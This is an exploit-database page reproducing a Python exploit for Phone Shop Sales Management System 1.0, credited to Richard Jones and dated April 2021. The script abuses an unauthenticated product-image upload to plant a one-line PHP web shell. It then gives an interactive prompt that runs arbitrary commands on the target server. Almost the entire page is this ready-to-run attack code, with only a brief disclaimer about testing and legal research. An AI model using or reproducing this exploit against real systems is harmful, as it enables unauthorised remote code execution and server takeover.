Advertisement






Phone Shop Sales Management System 1.0 Shell Upload

CVE Category Price Severity
N/A CWE-434 Unknown High
Author Risk Exploitation Type Date
Unknown High Remote 2021-04-20
Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040107

Below is a copy:

Phone Shop Sales Management System 1.0 Shell Upload
# Exploit Title: Phone Shop Sales Management System - Arbitrary File Upload (Unauthenticated)
# Date: 20/04/21
# Exploit Author: Richard Jones
# Vendor Homepage: https://www.sourcecodester.com/php/10882/phone-shop-sales-managements-system.html
# Version: 1.0
# Tested on: Windows 10 build 19041 + xampp 3.2.4

import requests
import sys

IP="127.0.0.1" # CHANGE ME

ADDURL=f"http://{IP}/osms/Execute/ExAddProduct.php"
CALLSHELLURL=f"http://{IP}/osms/assets/img/Product_Uploaded/rev.php"
s = requests.Session()

def postShell():

    data = {
        "ProductName":"1",
        "BrandName":"1",
        "ProductPrice":1,
        "Quantity":"1",
        "TotalPrice":1,
        "DisplaySize":"1",
        "OperatingSystem":"1",
        "Processor":"1",
        "InternalMemory":"1",
        "RAM":"1",
        "CameraDescription":"1",
        "BatteryLife":"1",
        "Weight":"1",
        "Model":"1",
        "Dimension":"1",
        "date2":"1",
        "Description":"1",
        "_wysihtml5_mode":"1",
       }

    
    fileData = {
        'ProductImage':("rev.php","<?php system($_GET['c']);?>", "application/octet-stream")}

    r = s.post(ADDURL, files=fileData, data=data)
    
    if "The product is successfully added" in r.text:
        return True
    else:
        return False

def runWebShell():
    try:
        while True:
            cmd=input("\033[32;1m" +"$: "+ "\033[0m")
            if cmd == "exit":
                sys.exit()
            r = s.get(f"{CALLSHELLURL}?c={cmd}", verify=False)
            if r.status_code == 200:
                print(r.text)
            else:
                raise Exception("Cmd error")
    except KeyboardInterrupt():
        sys.exit()

def banner():
    ban = r"""__________.__                             _________.__                      _________      .__                     _____         _________    
\______   \  |__   ____   ____   ____    /   _____/|  |__   ____ ______    /   _____/____  |  |   ____   ______   /     \       /   _____/    
 |     ___/  |  \ /  _ \ /    \_/ __ \   \_____  \ |  |  \ /  _ \\____ \   \_____  \\__  \ |  | _/ __ \ /  ___/  /  \ /  \      \_____  \     
 |    |   |   Y  (  <_> )   |  \  ___/   /        \|   Y  (  <_> )  |_> >  /        \/ __ \|  |_\  ___/ \___ \  /    Y    \     /        \    
 |____|   |___|  /\____/|___|  /\___  > /_______  /|___|  /\____/|   __/  /_______  (____  /____/\___  >____  > \____|__  / /\ /_______  / /\ 
               \/            \/     \/          \/      \/       |__|             \/     \/          \/     \/          \/  \/         \/  \/ """

    return ban

def main():
    print("\033[34;1m" + banner() + "\033[0m")
    print("\033[32;1m" + "Created by Richard Jones 20/04/2021"+ "\033[0m" + "\n")
    print("\033[72;1m" +"[+] Sending WebShell..."+ "\033[0m")
    if postShell():
        print("\033[72;1m" +"[+] Calling WebShell..."+ "\033[0m")
        runWebShell()

if __name__ == "__main__":
    main()

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum